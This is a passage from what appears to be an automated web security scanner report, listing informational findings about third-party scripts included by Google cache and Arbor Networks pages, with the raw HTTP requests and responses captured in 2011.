Content-Language: en-US
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 29339


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<
...[SNIP]...
</style>
<script language="javascript" src="http://usa.visa.com/js/visa.js"></script>
...[SNIP]...

17.67. http://webcache.googleusercontent.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webcache.googleusercontent.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search?q=cache:efdVqbelowMJ:www.invisionpower.com/products/board/+ipboard+software&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com HTTP/1.1
Host: webcache.googleusercontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:05:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<base hr
...[SNIP]...
</script>

       
<script type='text/javascript' src='http://www.invisionpower.com/assets//js/prototype.js'></script>
       <script type='text/javascript' src='http://www.invisionpower.com/assets//js/scriptaculous/effects.js'></script>
<script type='text/javascript' src='http://www.invisionpower.com/assets//js/scriptaculous/builder.js'></script>
       <script type='text/javascript' src='http://www.invisionpower.com/assets//js/ips.js'></script>
<script src="http://www.invisionpower.com/assets//js/cufon/cufon-yui.js" type="text/javascript"></script>
       <script src="http://www.invisionpower.com/assets//js/cufon/Myriad_Pro_Light_300.font.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script id="pap_x2s6df8d" src="http://affiliate.invisionpower.com/scripts/clickjs.php" type="text/javascript">
</script>
...[SNIP]...

17.68. http://www.arbornetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.arbornetworks.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/report
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; mbfcookie[lang]=en; PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.1.10.1296689848

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:36:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:36:15 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:36:15 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:36:16 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:36:16 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.69. http://www.arbornetworks.com/cleanpipes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cleanpipes

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cleanpipes HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:59:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=c241b599226c60ac60d1acf96b4d30a8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:59:11 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:59:11 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:59:12 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:59:13 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.70. http://www.arbornetworks.com/cn/865.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cn/865.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cn/865.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=cada0596b6710dfee8c2a5d05d8fb3a3; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:04 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:04 GMT; path=/
Set-Cookie: mbfcookie[lang]=cn; expires=Thu, 03-Feb-2011 23:56:05 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:56:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.71. http://www.arbornetworks.com/cn/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cn/infrastructure-security-report.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cn/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=a6fdb64d0958cf0e76e8f0349ee33ebb; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:04 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:04 GMT; path=/
Set-Cookie: mbfcookie[lang]=cn; expires=Thu, 03-Feb-2011 23:56:05 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:56:10 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.72. http://www.arbornetworks.com/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /contact

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1aff6b01abd27afdd96fe0d2ad40b22b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:24 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:24 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:55:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:55:36 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.73. http://www.arbornetworks.com/de/5.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /de/5.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /de/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9392548e368986818e7ef3684346dbbe; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:39 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:39 GMT; path=/
Set-Cookie: mbfcookie[lang]=de; expires=Thu, 03-Feb-2011 23:55:40 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:55:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.74. http://www.arbornetworks.com/de/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /de/infrastructure-security-report.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /de/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=cda3e494f5a0875e50aa6505ed501e3b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=de; expires=Thu, 03-Feb-2011 23:55:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:55:42 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.75. http://www.arbornetworks.com/deeppacketinspection  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /deeppacketinspection

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /deeppacketinspection HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:59:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=8c9555fafd1fa342be9a991bac0666ca; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:59:01 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:59:01 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:59:02 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:59:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.76. http://www.arbornetworks.com/en/9.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/9.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/9.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=903cef80854226a0d3bbe80a1ab82ead; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:23 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:23 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:24 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:52:24 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.77. http://www.arbornetworks.com/en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=45d2148a7c2093148f32ecdefe0aac0c; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:30 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:30 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:31 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.78. http://www.arbornetworks.com/en/arbor-in-action-global-network-security-solution-resources.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-in-action-global-network-security-solution-resources.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/arbor-in-action-global-network-security-solution-resources.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:47:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e5256e35d9a44c4de92206e7d625016a; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:20 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:20 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:21 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

17.79. http://www.arbornetworks.com/en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d21572adb250c8086746f946f177554e; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:15 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:15 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:16 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:52:17 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


